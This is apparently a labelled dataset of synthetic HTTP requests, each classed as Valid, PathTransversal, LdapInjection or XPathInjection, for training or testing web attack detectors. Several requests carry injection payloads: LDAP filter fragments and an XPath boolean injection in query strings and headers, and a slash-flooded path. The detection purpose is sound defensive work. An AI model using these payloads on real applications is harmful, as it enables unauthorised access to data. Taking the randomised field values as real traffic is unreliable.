----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44109
Start - Id: 22378
class: Valid
GET /VBwTEISVwO/tfopzi/KW6z7CHEw/egamewre.jsp?ec1luh9wsoiai7=naii&Aahouqt4=hpsnO%3F&P8KqscriptIuZtelnetA2=0olib&raolena=ad30eseea83aD&shrevejdes6u=nqs1sx6ibtc2cr&Reb=5350957&Nntkjc=ecruttn9twyX&1umt3dah=4lA&ZPDeXC=8olxyotixt&a5f=7cLV&4rtmoo5t=956381&Esndi02sos=6976&OaQZgstdinQfblVhtpass=k%40WpmGr_&emnieyz=Nxaudeeuultrr HTTP/1.1
Host: 10.114.116.140
Connection: jio0egeh
Accept: text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: pdy2jz=auc3ssD
Client-ip: 231.247.76.251
Cookie: esr9crW=ezh>o;Onetihcxl=3group byeniealltat6haicbennode=;hrgietma9sac=ermnunionv
Cookie2: $Version="6"
Date: Mon, 23 Jan 06 14:08:08 GMT
ETag: W/"rZV2_AcwMYX1wAjFkfQ-"
Expect: 100-continue
From: Thg1b@weOoea0a.org
If-Modified-Since: Sat, 23 Jan 10 03:50:08 CET
If-Unmodified-Since: Tue, 28 Aug 07 10:29:02 GMT
If-Match: *
If-None-Match: "7E-mqaVL2E1i2Y_J"
If-Range: Thu, 22 Jun 06 14:09:08 CET
Max-Forwards: 5
MIME-Version: 4.3
Pragma: ejr=R
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: Digest nonce
Range: -912509
Referer: /aemai/befanh/s9ma2edh/uOcoe8.wmn
TE: trailers
Trailer: Transfer-Encoding
User-Agent: 3o_THozzLn http://www.4Hnpsh.org
UA-CPU: StrongARM
UA-Disp: 0605,1336,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 112x1566
Via: 1.6 220.250.180.184
Transfer-Encoding: deflate
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22378
Start - Id: 26770
class: Valid
GET /hA8wqKz.e-A3Fqx47Q/ibv7Fkv/47metaNgroup bycqK/riuirflm9wea7/et7Rr4/4iZ/Uck1stlluudhsl/lesiuclnrjilAts/pjmL/x13MPpassthrunrmlFff1likeN.gif?TtsxNa7oiobai7=lj_gWwKGL&lDsUt=d.W.Axkfyg1&lcobVf6=odysdsr&passthruKOlocationE8=3b32uoVV&naib=ewinntinph-lssqfromz0r5p&qxe5yak2Ertl1=600666&ai=lAK&daSyrotTtrtd9=q7u&wisishs7=hnedwxeId&n8dn61wimenr=0dtlylHxro&N8tcmKan=7517&XI8Pg6=t%3Bp%3A&YchV8Ig=ylensdnos&rt3o=ir-8xMM&cozlnvmey4eent=pcd8lnwtTth HTTP/1.1
Host: www.tc6n.cz
Connection: Agst3
Accept: image/png, audio/*;q=0.0
Accept-Charset: utf-8, us-ascii;q=0.4, x-mac-roman;q=0.4, isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 120.60.149.77
Cookie: xfdaakptsi=shutdown8
Cookie2: $Version="868"
Date: Sun, 29 Jun 08 20:23:07 UTC
ETag: "ecRAGY-3geTFtmku3"
Expect: 100-continue
From: oGEsoi@p2axestm.gov
If-Modified-Since: Sun, 17 Dec 06 23:13:32 CET
If-Unmodified-Since: Sun, 06 Feb 05 23:20:30 GMT
If-Match: "QW1_jIP599TBx_bWQ"
If-None-Match: "RXOfeGKKuYuvuf2C"
If-Range: *
Max-Forwards: 278
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: sxjt uxsrq=ar1Aoefn
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: 76-3,2076-,-744104
Referer: http://www.einy.com/loi6erif/i5netnwe.asp
TE: trailers
Trailer: From
User-Agent: ltbreihins (n4G1PPhH; 6s6FkfHqUq; axmM0ZRc_v)
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 358x270
Via: 1.9 122.235.227.250, 3.2 www.NsE9jehe.js, 8.6 www.raeel.png
Transfer-Encoding: gzip
Upgrade: dt6ds/4.1
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26770
Start - Id: 45215
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: www.2s9os.de
Connection: ohal6
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.8, iso-8859-5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 115.213.88.73
Cookie: m4ZJ=08156;sutgAsgrb10a=isdUegs;sskiaih=46;seh1=ba%Saeitp9OeZR;9uiyleeroFa=octehea0dactaow;svltwna=17747
Cookie2: $Version="5"
Date: Thu, 12 Feb 09 02:40:46 CET
ETag: W/"_42@pBjVbX4bYLjRIkl"
Expect: okyem
From: 1p4rry@estl2a.org
If-Modified-Since: Tue, 21 Feb 06 05:39:31 UTC
If-Unmodified-Since: Thu, 09 Mar 06 19:57:03 GMT
If-Match: "l.vX.hJEasDfI8kBDA"
If-None-Match: "3feiAFLqyLA4s@5W6klb"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 60
MIME-Version: 3.6
Pragma: dicabtb='acqng8'
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM b2VkTGlueWVDV29hckVFYW5oMmV1OTFhdGRjYVJwZVNhYmVqNGF1ZQ==
Range: 223066-,90-340647
Referer: http://e8laen.com/et9sofRv/en9A/howt1/Sbethvk6.asmx
TE: trailers
Trailer: Expect
User-Agent: kig7/9.6.4
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2272x045
Via: 7.2 1.187.9.147:3794, FTP/4.1 www.eRtze.js
Transfer-Encoding: to2uw
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 254.23.68.104
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45215
Start - Id: 13997
class: Valid
GET /luTU@s6FvlD_t7/ttktstt/oZC0rGCxYM_-F/ifecjYL/C3between4cFexechXshutdownINbgsound9/ahl3K_J1RB4kkOtSI4SX/WpD97gKYTlogusr.6aG/Te8l53eet8sfs0ct0gd/ojD6b9QjWQNPo26Y/xllisOKtKeotfecietn.sh?zUCaHIO=%7Esosniaoat9hw3x&tHesmunhlphan=hsT&xaTNztOemdenat=bISyq&cytmai=7489&https5stdinQAe=fo&Enefet4utedH2=re%3Ao%3F7Saioior&lideuIoewun=4212332&aemcem=sitelnete&tnn8aE4=ehai%24a%26Gt+l&kbzw3efhbhT5=d9w-SpX HTTP/1.1
Host: 149.170.112.238
Connection: tiobhwiA
Accept: image/gif, application/*;q=0.8
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: compress;q=0.5, deflate;q=0.5, gzip, deflate;q=0.6
Accept-Language: e-zSadurp;q=0.8, ogmwshhd-t6e
Cache-Control: only-if-cached
Client-ip: 99.235.42.106
Cookie: atwaIoN=trt;zdheecnz=5p0N1d6;lwcabsnp1dip=9277321199;lt=suvhtn2Eeuesoi;7hnt=7980739;Aincfnsd39x5y=3917250
Cookie2: $Version="0"
Date: Thu, 25 Aug 05 01:21:03 CET
ETag: "PKj2Hk_f-cVsVCSIONx@"
Expect: 100-continue
From: er5oylr@eeie3.org
If-Modified-Since: Mon, 13 Apr 09 02:31:52 CET
If-Unmodified-Since: Tue, 24 Jun 08 10:55:38 CET
If-Match: "z4rheoAPAWitd7fN7"
If-None-Match: *
If-Range: Wed, 28 Feb 07 23:28:27 GMT
Max-Forwards: 5679
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: jjvPD Tebkhb=8eehmla
Authorization: rof4t boioiest=ee5udrei
Range: 986633-,-445,64-7061
Referer: /ylat2od/mxooo/Osepp/ogmKi/buueens.asp
TE: trailers
Trailer: Date
User-Agent: sa5ngsTtme (ozRfJit)
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 8.7 www.eehyr.js:6247, ln1tt/3.0 1.140.89.68
Transfer-Encoding: identity
Upgrade: fdtec/9.3, yna9n/5.0
Warning: 365 73.10.186.55 "2arihkO" 
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 738264285065396
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13997
Start - Id: 8875
class: Valid
GET /lanupert9kn2porpeomf/sLSjxdt9VcKcNO6q2FA/adDfmSPlB1/iharmit4hz/6woabiEsdwt/nrDsYGw04qUX/ElFupdatemkHRlikexv/RPvobject.mspx?nEue7aBoutd2=4215&anpaeoiFq=daocmdqh%5Dh4%5Brohpivbscriptobject+Nlog&rs8=3%24o&3o=hljvoO7nls&T8p=1688590&Domu=5871786790&grtlodsl4=000&um=52&ntsom2dfOnrc=YolikecolibeoTnceEciey HTTP/1.0
Host: www.eteoisroeq.net
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.2, iso-8859-2;q=0.1, windows-1251;q=0.8, euc-jp;q=0.8
Accept-Encoding: compress, gzip;q=0.8
Accept-Language: s-dse;q=0.8, usAeTzjP-di7skie;q=0.2, awantau-Nfen;q=0.8, facekhzn-uuo;q=0.0, heoe-qoae;q=0.2
Cache-Control: max-stale
Client-ip: 36.44.215.228
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="980"
Date: Thu, 30 Jun 05 05:42:40 UTC
ETag: W/"xpB9lcdUhtkgRzEnu83H"
Expect: 100-continue
From: iu0es@geoakos.de
If-Modified-Since: Sun, 03 Oct 04 12:54:29 CET
If-Unmodified-Since: Sat, 22 Nov 08 06:03:35 CET
If-Match: "kk4vNS20zlhgHFmX8Y4"
If-None-Match: "FjFLAES@Vd693cux"
If-Range: *
Max-Forwards: 610
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic cmVoZHJzOmV5cjdpYUJt
Authorization: Basic dTIwZWRoOmVobmFjbkVp
Range: 85-
Referer: /Geae/c7uqTiei/i0is.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.4 (Windows; U; WinNT 8.9; yi-m5; rv:2.0.7) Gecko/06403258
UA-CPU: Sparc
UA-Disp: 359,1522,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3568x0188
Via: HTTP/4.6 249.157.99.30, tzso1/3.3 78.86.47.77:25178, 2.1 www.hniH.jpeg
Transfer-Encoding: deflate
Upgrade: rudtA/2.1, e5r/5.2, Ndas/0.8, iomgfE/7.8
Warning: 295 www.trrmnci.htm "lutuwiehtspuezbeode" 
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8875
Start - Id: 37563
class: LdapInjection
PUT /4-pXiaFOHv3o/neoues8aareczta.aspx? HTTP/1.0
Content-Length: 286
Content-Language: lehc
Content-Encoding: deflate
Content-Location: /lneeoe/odRk1e.sh
Content-MD5: b3Rrb2JvZFJtYXlvZmlhNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Mar 04 11:03:05 GMT
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: www.iheno6qgmv.it
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.5, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.190.23.163
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="86"
Date: Wed, 22 Feb 06 18:21:41 GMT
ETag: W/"enilrOj7ei_-Z4H8rKq"
Expect: liIlS
From: oenu@5hnawusete.de
If-Modified-Since: Thu, 14 Jan 10 05:27:36 UTC
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: Mon, 16 May 05 05:58:40 GMT
Max-Forwards: 0
MIME-Version: 9.9
Pragma: sh6h5t='haceYer'
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -74,-46159,08-370587
Referer: http://www.n6eLedag.net/k9tgf/eDaea/knhb.swf
TE: deflate,chunked;q=0.5,trailers
Trailer: If-None-Match
User-Agent: naorotp (01g67IU2; o38SePi; oha9PJGs4; eySV-Fj8)
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1680x065
Via: 6.5 www.uf7ept5.jpeg, eAsedr/7.2 www.9ttm.css
Transfer-Encoding: compress
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

openX-R=37tstrea]F7b ry&ooGngsleasco=dseoiblidatrbtrrh&bcseOhilnre8=heioen&E8bhTbO9lsg=yiduitagsj)n2se&1eval-zQaccept=s &Teose5uS6=848176&esywaisesr=ejheeitlgkoe96xoai&slsic=428)(&(objectClass=NAw)(|(sn   = bot)(cn=euo  J*))&enllR4gmhtss=iwsrDadhRdLrh2

End - Id: 37563
Start - Id: 26513
class: Valid
GET /aptniRiu0IawxE/xzxk33QZ4PHUs/erDi/nfli4uta/hrgTjfwj/Stet7en/cxpNdf.Hm37/rnea8yneeiyroe/nnte8sdarel4an9nee87/eWRbHSUyuUP/rno4e/7yXpYsoZJy.mspx?edmmmsqt5siice=rt%40%3BT+%248vtlm%40-me&LGhtpassIX09rpmxj=6A%27connectfrL%3Cunionay&Lb4x=%3CS%3BsaX+eee+&oaei7eS3l=rih%40a1thso3&ipd=83299933&eet8edyee=OA+copyaq&beyGesbENott=055595&bVobtsen=7734&lin0tamse=eedarNbe99YS5naisc&rR8SlOlSMwtrE=%3Amoaecytfyfy+id0 HTTP/1.1
Host: www.oisnznno.st
Connection: keep-alive
Accept: video/mpeg, video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, deflate;q=0.5
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 77.75.121.160
Cookie: lebttl3intaif=0417138;eAmi6tskaElhe=871330;dbael=n47f;Luq@CugOKrV=aRk
Cookie2: $Version="6"
Date: Mon, 30 Jan 06 01:13:22 GMT
ETag: "eY1L8od5@@yXGGQz"
Expect: 100-continue
From: 4e5f4@aengr.net
If-Modified-Since: Mon, 09 Apr 07 24:04:02 CET
If-Unmodified-Since: Mon, 09 Aug 04 01:18:36 UTC
If-Match: "IGWlIgssE.4Wi6CVUn"
If-None-Match: "VBkq8XowhGYXgkqRFIH"
If-Range: *
Max-Forwards: 34
MIME-Version: 8.8
Pragma: f4Ei='f'
Proxy-Authorization: NTLM aXRlaTVJZTZGdGFtZTR1c0NkZWF0Mmh0b2ZzcmxTeHJlbnNtbnM=
Authorization: Eo0nh rhOmtoo=2hcade
Range: -51243,13953-
Referer: /Kiddm0/Aeij/n3tOaQh/sDo6.pl
TE: trailers,chunked,gzip;q=0.7
Trailer: TE
User-Agent: dGg0nP http://www.bhbYws.de
UA-CPU: MIPS
UA-Disp: 9620,0046,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4772x6036
Via: ntEmt5/2.9 www.wmcbg.tiff, 7.0 www.tj5cbCam.shtml
Transfer-Encoding: compress
Upgrade: erCd/6.1
Warning: 836 www.nehybsh.png:6 "sp4oewrMtto" "Tue, 03 Feb 04 12:30:53 UTC"
X-Forwarded-For: 251.182.204.109
X-Serial-Number: 8696612011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26513
Start - Id: 21271
class: Valid
GET /2pMfm/Ee/onarRI97uoeXdrI.js?om=st%3Afut&bdsetb=tottdEe+ejnotNk&cemoisy2ine6f=ro7e&7tnRooqr=sinieiEanahoetrir&Ejw=si8%5Dl%29a&ooN7ii=lHh&9es0hddtsr3nCo=6im5gsftnwIi5p&hxuwoi=759&0tnaStanlrt=435 HTTP/1.0
Host: 200.57.160.226
Connection: close
Accept: */*
Accept-Charset: shift_jis, iso-8859-4, x-mac-chinesesimp;q=0.3, iso-8859-6;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=44154
Client-ip: 230.55.210.245
Cookie: samFvbscriptunion-R=bgsoundcdhri
Cookie2: $Version="42"
Date: Mon, 03 May 04 19:31:36 CET
ETag: "Wp4kjMlL8y21Wia"
Expect: hOsusai=daoao;7tesylm=de1l
From: rodie@O0kE.st
If-Modified-Since: Fri, 02 Feb 07 05:58:32 CET
If-Unmodified-Since: Thu, 05 Jun 08 24:55:17 CET
If-Match: "R_WJ-@NbxIw-HXPLj-"
If-None-Match: "U2JLLedqAQnUmfF"
If-Range: "MNefeDsrRzZd5Pmi"
Max-Forwards: 2
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest username="ounet"
Authorization: Basic czRpaGNwYW86c3kxdm1haA==
Range: 793-,8602-038713,9-
Referer: /tRt4t/dsjudii/Ndirr/adhport/lLne.nsf
TE: trailers
Trailer: Date
User-Agent: orOuweeey (uTxeoo; pCULCov)
UA-CPU: PowerPC
UA-Disp: 552,365,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 714x7693
Via: FTP/9.8 30.200.118.169, 9.1 www.shAe.jpeg:938, 7.3 249.179.117.101
Transfer-Encoding: gzip
Upgrade: pfBcec/8.2
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 172.206.4.103
X-Serial-Number: 900444
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21271
Start - Id: 5478
class: Valid
POST /55@1Xu/BQIqM/msaaTkttsi4Nent.jpg? HTTP/1.1
Content-Length: 222
Content-Language: 9scshe
Content-Encoding: identity
Content-Location: /cfd8/6ibrnse.bin
Content-MD5: czVsM2VoeWp1aHN5bnRhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 09 18:33:14 CET
Last-Modified: Sun, 18 Apr 04 24:18:03 CET
Host: 80.38.233.230:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.9, euc-cn;q=0.7, iso-8859-8, koi8;q=0.8, cp-932;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 13.15.222.251
Cookie: aOhgkwedhras=khdIaOettn le;denu=8)7vbscripto;texfoij=uAuolprklrn
Cookie2: $Version="6"
Date: Thu, 15 Dec 05 09:30:52 GMT
ETag: W/"yeToIhRYJ2ge3RgehuiR"
Expect: btrfti0y
From: lczro@ehIntmhe.com
If-Modified-Since: Sun, 25 May 08 02:03:34 CET
If-Unmodified-Since: Sat, 25 Dec 04 21:11:08 GMT
If-Match: "F_@hC-30QcnJg83Fur"
If-None-Match: "qSurb9MEQ8YmghMr"
If-Range: Thu, 17 Mar 05 13:30:24 GMT
Max-Forwards: 514
MIME-Version: 6.9
Pragma: cbrAd6=oaabecse
Proxy-Authorization: Digest nonce
Authorization: dzoqe nhDsn=arfH
Range: 739186-6
Referer: http://stze.it/maia8/acbp/nstiaaSi/umrterf.gz
TE: chunked;q=0.5,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.5 (Windows; U; Win 9x 1.4; dr-tj; rv:9.6.7) Gecko/30884321
UA-CPU: StrongARM
UA-Disp: 4898,121,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2642x571
Via: FTP/5.5 57.210.63.46
Transfer-Encoding: gzip
Upgrade: iashj/1.2, vlrlkr/1.0, tesek/2.7, haauNe/7.3
Warning: 081 www.m8rn1rmo.shtml:31303 "6h7tteywuheldre" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ---------------------
~~~~~: ~~~~~~~~~~~

XRGGRF=KtenuaMm3&Uhsock_streamH3EUC=oh6lrtomerexe&7heceoepriQ=rosZc&aes6oe2=288&6at=elgGo&tMSAicAmwi=pcS&bsq=2&zdoerwOeaylaukt=ipassthru e&eg2=5&9mt=p/f4qc)aoce&aattoomtshcmd=fghibett&qH5z=6&tmbftos=2&adnEWsnr=eIF6@Q

End - Id: 5478
Start - Id: 37370
class: LdapInjection
GET /kconnectpositionHC6uGwR2usrnA/a0or5Ho_EIhAHt/styi3reNt/l1IUGdEeomb@nE0a.jpg?DreyOi=rurjeEDrh4sd&te6QiframebLautoexec=erssas6alolL&3systemJV.havingQChD=rzts HTTP/1.0
Host: 73.13.202.198
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: hz-gb-2312, us-ascii, gb2312, windows-1254;q=0.3
Accept-Encoding: 
Accept-Language: gowa)(&(objectClass=    rtz*)
Cache-Control: no-store
Client-ip: 115.169.125.19
Cookie: no=dAgFJaNoKYp;etcGA55vX0=8esJtservices 64hEpxtejpv;eem=o0Da>likesk8af;tssadXdtOEdav=852301472
Cookie2: $Version="00"
Date: Fri, 28 Mar 08 21:22:58 CET
Expect: 100-continue
From: mBdt@z8nsodsh.cz
If-Modified-Since: Sat, 15 Oct 05 23:52:47 CET
If-Unmodified-Since: Mon, 28 May 07 04:16:09 GMT
If-Match: "YofyW7y08ncjcEr"
If-None-Match: "Pve_LX_a_qpjKVk41wG"
If-Range: Thu, 13 Mar 08 16:43:08 CET
Max-Forwards: 31
MIME-Version: 0.9
Pragma: ah='l6u4Ee6H'
Authorization: Digest realm
Range: -6639,23-773021
Referer: /ufnricm/bjdye/Ona1/CqnErrg.js
TE: gzip,chunked
Trailer: Trailer
User-Agent: Mozilla/1.7 (X11; U; Linux i586 3.1; ih-eb; rv:3.9.4) Gecko/16624306
UA-OS: WinNT
Via: lnaT/8.4 20.74.103.143
Transfer-Encoding: deflate
X-Forwarded-For: 170.106.4.226
----: ---------------

null

End - Id: 37370
Start - Id: 4825
class: Valid
PUT /sOUoamC1pe.shtml? HTTP/1.0
Content-Length: 312
Content-Language: itrpxw,aqe,eolmen0T
Content-Encoding: compress
Content-Location: /wkol/idbif1ha/smlnl5ce/brwt6/acstndLr.ace
Content-MD5: bWV2b3NjaW9sSnNzckFlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 May 04 10:11:21 GMT
Last-Modified: Mon, 24 Sep 07 23:07:31 UTC
Host: www.hotooI1rq.st
Connection: chelmq
Accept: audio/*;q=0.7
Accept-Charset: iso-8859-8, iso-8859-7;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.1
Cache-Control: max-stale=5569
Client-ip: 231.246.8.161
Cookie: e1Oletti=]n3aonulldeleteo;c1szxpe=8;oeHehzmnhra2=eQfc53
Cookie2: $Version="1"
Date: Mon, 26 Dec 05 19:38:29 GMT
ETag: "_.Wi-eBBGDIz1mEb8R"
Expect: 27ass=nveetlis;etihe
From: leaTmHa@pheie.net
If-Modified-Since: Sun, 14 Oct 07 08:20:10 CET
If-Unmodified-Since: Fri, 24 Oct 08 23:54:49 CET
If-Match: "7VsV9xF01xuLsOhSL6IT"
If-None-Match: *
If-Range: "9xP9NHCgcPASeOkC0Y"
Max-Forwards: 7141
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dGVyZHFuRXNSYWVlZ2Voa3VoY3Vtd2JkOGVlZTd5ZWV5bg==
Authorization: NTLM aTVzZ2xyb1NiZWNwbmxwb05kb2luMmhhcDdleGdhaDRpaGFscmE=
Range: -14
Referer: http://www.rlsa.gov/n1t1ah/aets4/uneO.swf
TE: trailers,gzip;q=0.7,deflate
Trailer: From
User-Agent: oswheqdst/8.0.5
UA-CPU: 68000
UA-Disp: 0621,287,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9174x0420
Via: 7.2 www.ijetI.jpeg:0
Transfer-Encoding: deflate
Upgrade: pltw/8.5, i0og/2.1, mto/5.0, khh/6.6, 54e/7.6
Warning: 256 www.esor2sne.html "tuocRrfoedT9hanfoqeo" "Sat, 03 Feb 07 19:15:16 UTC"
X-Forwarded-For: 92.118.218.21
X-Serial-Number: 408211072514512
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

it0hse=ftpftrnet+pg5o&n6sa4yf=0620&schi=h&epla3eemheeod=mhponeTrhrr&eoh4e=n6zPkANkPk&axt0an47ht=T40g;ll101nadmin-xp_catroopassthru<&torbnmilerv9=El|iM6include@soeeist&k3=A &&9WwYEkpsBZIe=tjmTdrtpDrtdter&spehscesidaoa=nu.c3uMT7Dx&jbbinN@c=u@yKA7xj2oO2&lhhDncdSereuc=kFE9&eaeMmnrio2Ooz=ueQgioaa88rii6

End - Id: 4825
Start - Id: 19549
class: Valid
GET /mnb-BU@Qw/p@WjMU_uR6m/yoostbtE/sFnIMYCdTUyt/nctw/AK@v6nuD/mxn/8VX/zPB.htm?8hgsntasdSisJtl=1257764932&tlosrsaB=362777&airhdwasgndiu=225&r9qs=8t%3BMo&mjnkgshossdl=ts1r1og&CDZU3=0t2o%26%25ob%7Coe&RvMbnph--I1libs5n=oty&gieLuntih=5345&systemmIA=l&vi=rchildnoT%25u&mhraoT8tdt=tl1qvGSy6qw&dgqlogrBdx=807&urtnetutyai1so=Eshrc&idVb_scripty=8&fyaue36vSrdmt1s=36810488 HTTP/1.1
Host: www.n5nEs.com
Connection: keep-alive
Accept: image/*, video/mpeg, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=05
Client-ip: 247.97.11.128
Cookie: x1tcec=766;m8rhb5tcioD7ity=tmp+camis>Streisd
Cookie2: $Version="4"
Date: Tue, 14 Aug 07 11:09:17 GMT
ETag: "pwhBmkWUsY.qmAUm8"
Expect: emeCt
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 05 Feb 09 17:52:26 UTC
If-Unmodified-Since: Sun, 27 Feb 05 06:10:47 CET
If-Match: "JVcZynwGilE42jddDrxa"
If-None-Match: "SCoj_9sYDwa9JMEYxWI"
If-Range: Sat, 23 Jun 07 15:05:05 UTC
Max-Forwards: 8338
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Houyig La3tes=eueu9ake
Authorization: Basic TjNZbTI6Smw0MW4=
Range: 156-,0-
Referer: http://www.grWelaR4.it/g6wse.asmx
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/2.3 (Machintosh; U; PPC Mac OS X 1.4; Ls-eh; rv:2.1.8) Gecko/20537308
UA-CPU: MIPS
UA-Disp: 146,7651,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 690x0416
Via: HTTP/0.3 www.Eeewlyuh.jpg:7750, yrx/6.1 137.108.83.16, 4.0 www.cdcsNa.js
Transfer-Encoding: deflate
Upgrade: blY3i/9.6
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 77.22.60.7
X-Serial-Number: 00842
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19549
Start - Id: 49594
class: XPathInjection
GET /thsc/access_logH2t/dR3@/iotrarVJ5ad/o5jAlJW./7ikeiaxl5ooegkett/s6bnnr1ra/@p1nyCY1/gwlrheLlsLSeltrqUhxn/qjXfIS/KFGaD9IandF.asmx?oaonn7itneaje=Tn3nRatn%27++++or++++1%3C+++wt%2Fn94pnn%2FlR%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D68%5D++or+++++%27nadsdo%27+++%3D+%27 HTTP/1.1
Host: www.iihoe.be
Connection: ee4s
Accept: */*
Accept-Charset: big5, iso-8859-8;q=0.0, iso-8859-4
Accept-Encoding: 
Accept-Language: eed-daesr9n;q=0.7, nes-t, pia6r-tHes7Zti, o-o0e, s-semL
Cache-Control: min-fresh=8
Client-ip: 132.114.34.1
Cookie: cD=union;aWSJem=177
Cookie2: $Version="81"
Date: Sat, 30 Jun 07 23:31:50 GMT
ETag: "45E@hf2nml@00lw"
Expect: 100-continue
From: rmya@typuTon9h.uk
If-Modified-Since: Wed, 14 Oct 09 22:41:20 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "LO9b7hYY9eNClVead"
If-None-Match: *
If-Range: "VG00Mw9pd70WJk."
Max-Forwards: 5
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: NTLM aWNvZW5zc3NvbnRpbjZlYW1tYWVhcnNlVGVkZWh1d3dhZGVoYWU=
Range: 124-314534,89-
Referer: http://www.r9ha2h.it/EbudeslC.php
TE: deflate;q=0.8,chunked;q=0.4
